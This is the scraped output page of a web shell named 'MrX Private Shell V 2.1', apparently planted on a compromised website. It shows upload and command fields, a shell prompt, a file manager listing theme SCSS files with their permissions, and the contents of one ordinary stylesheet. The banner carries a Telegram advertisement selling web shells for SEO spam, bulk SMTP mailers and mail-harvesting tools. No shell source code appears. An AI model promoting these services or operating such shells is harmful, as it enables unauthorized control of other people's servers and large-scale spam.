__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
%g-button {
    display: inline-block;
    font-family: get-font-family($font-family-title);
    font-weight: $font-weight-semibold;
    font-size: $core-font-size - 0.2;
    line-height: 1.15;
    letter-spacing: 0.1rem;
    text-transform: uppercase;
    background: $accent-color-1;
    color: $white;
    border: 1px solid transparent;
    border-radius: 2.5rem;
    margin: 0 0 0.5rem 0;
    padding: 1.5rem 3.125rem;
    vertical-align: middle;
    text-shadow: none;
    transition: all 0.2s;

    &:hover,
    &:active,
    &:focus {
        background: darken($accent-color-1, 10%);
        color: $white;
    }

    &:disabled {
        opacity: 0.25;
        cursor: not-allowed;

        &:hover {
            background: $accent-color-1;
        }
    }
}

// Buttons
.btn {
    border-radius: $core-border-radius;
    border: 0;
    color: $base-text-color;
    box-shadow: none;

    span {
        padding: 0;
        margin: 0;
    }
}

// Login and registration page fixes
.login {
    fieldset {
        padding: 0;
    }

    .plg_system_webauthn_login_button {
        padding-top: 0.9rem;
        min-height: 60px;

        svg {
            vertical-align: middle;
        }
    }
}

#g-page-surround {
    .input-password-toggle {
        padding: 0.375rem 0.75rem;
        margin: 0;
        border-radius: 6px;
        border-top-left-radius: 0;
        border-bottom-left-radius: 0;
    }

    meter {
        width: 100%;
    }
}

.btn-mini {
    margin: 0.5rem 0;
}

.btn-primary {
    font-family: get-font-family($font-family-title);
    font-weight: $font-weight-semibold;
    font-size: $core-font-size - 0.2;
    line-height: 1.15;
    letter-spacing: 0.1rem;
    text-transform: uppercase;
    background: $accent-color-1;
    color: $white;
    border: 1px solid transparent;
    vertical-align: middle;
    text-shadow: none;
    transition: all 0.2s;

    &:hover,
    &:active,
    &:focus {
        background: darken($accent-color-1, 10%);
        color: $white;
    }
}

.btn-group>.btn.dropdown-toggle {
    background: darken($base-background, 12%);
}

.btn-group.open .btn-primary.dropdown-toggle {
    background: $accent-color-2;
}

.dropdown-menu>li>a:hover,
.dropdown-menu>li>a:focus,
.dropdown-submenu:hover>a,
.dropdown-submenu:focus>a {
    background-image: none;
    background: $accent-color-2;
}

.btn-link {
    color: $accent-color-1;
}

// Tables
table.table-bordered {
    border-collapse: separate;

    th {
        background-color: #eceff3;
    }

    thead th {
        background-color: darken(#eceff3, 5%);
    }
}

.table-striped tbody tr:nth-child(2n+1) td,
.table-striped tbody tr:nth-child(2n+1) th {
    background: #eceff3;
}

.table-hover tbody tr:hover {

    >td,
    >th {
        background: darken(#eceff3, 3%);
    }
}

.table,
.table-bordered {
    border-color: $base-border-color $base-border-color $base-border-color transparent;

    th,
    td {
        border-left-color: $base-border-color;
    }
}

// Edit Page
.edit.item-page {

    .inputbox,
    .chzn-choices {
        border-radius: 6px;
        ;
    }

    .input-append {
        .inputbox {
            border-radius: 6px 0 0 6px;
        }

        button {
            border-radius: 0 6px 6px 0;
        }
    }

    .btn-toolbar {
        .btn {
            @extend %g-button;
            font-size: $core-font-size - 0.4;
            padding: 1.1rem 2.725rem;
            margin-left: 5px;

            span {
                margin-right: 5px;
            }
        }
    }
}

// Labels and Badges
.label,
.badge {
    vertical-align: middle;
    font-size: $core-font-size - 0.2;
    font-weight: $font-weight-regular;
}

.label-info,
.badge-info {
    background: $accent-color-2;

    &[href] {
        background: $accent-color-2;
    }
}

// Pager PageNav
.pager.pagenav {
    a {
        @extend %g-button;
    }
}

// Pagintation
.pagination {
    text-align: center;
}

// Print Mode
.print-mode {
    #g-page-surround {
        padding: $content-padding;

        .btn {
            a {
                font-family: get-font-family($font-family-title);
                font-weight: $font-weight-semibold;
                font-size: $core-font-size - 0.2;
                letter-spacing: 0.1rem;
                text-transform: uppercase;
                border: 1px solid transparent;
                text-shadow: none;
            }

            .icon-print {
                margin-right: 5px;
            }
        }
    }
}

Filemanager

Name Type Size Permission Actions
_buttons.scss File 137 B 0664
_core.scss File 4.39 KB 0664
_forms.scss File 3.15 KB 0664
_modules.scss File 4.81 KB 0664
_tabs.scss File 486 B 0664
_tags.scss File 533 B 0664
_typography.scss File 1.12 KB 0664
_utilities.scss File 4.09 KB 0664
Filemanager